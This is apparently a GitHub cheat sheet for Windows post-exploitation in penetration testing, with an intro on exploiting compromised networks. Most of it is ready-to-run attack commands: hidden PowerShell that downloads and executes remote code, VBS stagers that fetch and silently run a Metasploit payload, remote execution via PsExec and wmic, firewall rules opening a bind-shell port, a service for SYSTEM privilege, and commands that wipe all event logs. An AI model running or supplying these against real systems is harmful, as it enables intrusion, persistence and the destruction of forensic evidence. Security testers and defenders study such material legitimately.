Skip to content

Latest commit

 

History

History

4.Post-Exploitation

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

Authors: < nixawk >


Post Exploitation - Windows

Post exploitation is a critical component in any penetration test. This is where you differentiate yourself from the average, run-of-the-mill hacker and actually provide valuable information and intelligence from your penetration test. Post exploitation targets specific systems, identifies critical infrastructure, and targets information or data that the company values most and that it has attempted to secure. When you exploit one system after another, you are try- ing to demonstrate attacks that would have the greatest business impact.

When attacking systems in post exploitation, you should take the time to determine what the various systems do and their different user roles. For example, suppose you compromise a domain infrastructure system and you’re running as an enterprise administrator or have domain administrative-level rights. You might be king of the domain, but what about the systems that communicate with Active Directory? What about the main financial applica- tion that is used to pay employees? Could you compromise that system, and then, on the next pay cycle, have it route all the money out of the company to an offshore account? How about the target’s intellectual property?

Suppose, for example, that your client is a large software development shop that ships custom-coded applications to customers for use in manufac- turing environments. Can you backdoor their source code and essentially compromise all of their customers? What would that do to harm their brand credibility?

Post exploitation is one of those tricky scenarios in which you must take the time to learn what information is available to you and then use that infor- mation to your benefit. An attacker would generally spend a significant amount of time in a compromised system doing the same. Think like a malicious attacker—be creative, adapt quickly, and rely on your wits instead of auto- mated tools.

Remote Management

Command Description
NET USE \\ip\ipc$ password /user:username Make a ipc connection with remote service, if successful, you can try to view, query, .... with the right privilege.
NET USE z: \\ip\share$ password /user:username Map remote share as local drive z:
systeminfo /S ComputerName /U username /P password This tool displays operating system configuration information for a local or remote machine, including service pack levels.
tasklist /S SERVER /U DOMAIN\username /P password displays a list of currently running processes on remote machine.
taskkill /S SERVER /U DOMAIN\username /P password kill an process in remote server.
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))" Execute code from remote server.
powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')" Download a file from remote server.
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1 Execute test.ps1 on localhost
bitsadmin /transfer systemrepair /download /priority normal http://path/to/file c:\path\local\file Create a job called systemrepair to download a file from remote server.
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs

cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename
Download File with vbs
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs

cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt
Dwonload and exec metasploit vbs payload.
PsExec.exe \\192.168.206.145 -accepteula -u username -p password cmd.exe /c ver Run remote windows commands, and return results
wmic /node:SERVER /user:DOMAIN\username /password:password process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt" Create a new process on remote server. No command results return.

PROXY

Command Description
NETSH INTERFACE portproxy add v4tov4 listenport=LPORT connectaddress=RHOST connectport=RPORT [listenaddress=LHOST protocol=tcp] Transmit data from localport to remoteaddr:remoteport.
set http_proxy=http://your_proxy:your_port
set http_proxy=http://username:password@your_proxy:your_port
set https_proxy=https://your_proxy:your_port
set https_proxy=https://username:password@your_proxy:your_port
Use proxy in command prompt

Whitelist

Command Description
NETSH FIREWALL show all Show Allowed programs configuration for Domain/Standard profile.
NETSH FIREWALL add allowedprogram C:\Windows\system32\cmd.exe cmd enable Add a program into firewall allowedprogram Whitelist.
NETSH FIREWALL delete allowedprogram cmd delete a item from firewall allowedprogram Whitelist, you can also use a path to delete it.
NETSH FIREWALL show all Show Port configuration for Domain/Standard.
NETSH FIREWALL add portopening tcp 4444 bindshell enable all add tcp port 4444 into port Whitelist.

Service

Command Description
sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename Create malicious services, and gain local system privilege.

Scheduler

Command Description
net use \\IP\ipc$ password /user:username
at \\ComputerName time "command"
The AT command schedules commands and programs to run on a computer at a specified time and date. net time [/domain] to show current time.

Logs

Command Description
del %WINDIR%*.log /a /s /q /f Deletes all *.log files from the %WINDIR% directory.
wevtutil el Lists the different log files the system is keeping.
for /f %a in ('wevtutil el') do @wevtutil cl "%a" Clears the contents of a specific log.
powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security Clear specific event logs

Links

  1. How to execute metasploit vbs payload in cmd.exe ?
  2. Hacking Windows Active Directory
  3. How to dump windows 2012 credentials ?
  4. How to use PowerSploit Invoke-Mimikatz to dump credentials ?
  5. How to use vssadmin ?